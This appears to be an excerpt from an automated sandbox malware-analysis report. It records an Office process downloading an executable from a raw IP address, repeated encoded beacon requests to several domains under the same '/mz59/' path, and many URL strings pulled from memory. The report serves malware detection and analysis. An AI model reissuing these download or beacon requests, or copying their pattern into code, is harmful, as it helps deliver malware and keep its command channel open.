Source: global traffic	HTTP traffic detected: GET /mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qn HTTP/1.1Host: www.tennessyherb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg== HTTP/1.1Host: www.bestpodstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?u2M0SF6h=OYXdaeXg9F3JN4qYjwOEDyjla/tUwsNCNX4C8lXWM8yJouL0vi1vAZ6NQlgRanHRrjTU7w==&rFN0=Xrx4qn HTTP/1.1Host: www.xjcg168.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?u2M0SF6h=DyvGskzBclCbgEHOjTp+IehUzdGnZKMlyQnRi93amGKEFkS3cbEvMjPLMaYESsyOmM8Qkw==&rFN0=Xrx4qn HTTP/1.1Host: www.pellatrap.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74
Source: Joe Sandbox View	IP Address: 184.168.131.241 184.168.131.241
Source: Joe Sandbox View	IP Address: 184.168.131.241 184.168.131.241

Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: sun-asnSC sun-asnSC
Source: Joe Sandbox View	ASN Name: YAHOO-3US YAHOO-3US
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: GET /vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.129.22Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.129.22

Source: C:\Windows\explorer.exe

Code function: 6_2_02972302 getaddrinfo,setsockopt,recv,

6_2_02972302

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46B6EF3.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.129.22Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww== HTTP/1.1Host: www.hostingbisniz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?u2M0SF6h=6o65y5aQ3K5IIOIZSpB7cm3zMzY8A11b3Xh1T1GzD81isrOpTqP8VmdELK0Vgou9N3EQzw==&rFN0=Xrx4qn HTTP/1.1Host: www.8no3.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=2h5hbT8wvHGvzmy0HBHdrVji2gh81Syn3N+I4+PuKAlq7cZqA7t6XPE7i2q+Hmh3HpIQwA== HTTP/1.1Host: www.cna-notary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qn HTTP/1.1Host: www.tennessyherb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg== HTTP/1.1Host: www.bestpodstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?u2M0SF6h=OYXdaeXg9F3JN4qYjwOEDyjla/tUwsNCNX4C8lXWM8yJouL0vi1vAZ6NQlgRanHRrjTU7w==&rFN0=Xrx4qn HTTP/1.1Host: www.xjcg168.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?u2M0SF6h=DyvGskzBclCbgEHOjTp+IehUzdGnZKMlyQnRi93amGKEFkS3cbEvMjPLMaYESsyOmM8Qkw==&rFN0=Xrx4qn HTTP/1.1Host: www.pellatrap.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.hostingbisniz.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Thu, 26 Nov 2020 20:17:42 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7

Source: explorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2149115180.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000006.00000000.2144836367.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2144836367.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000002.2347213984.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2132538973.0000000002421000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
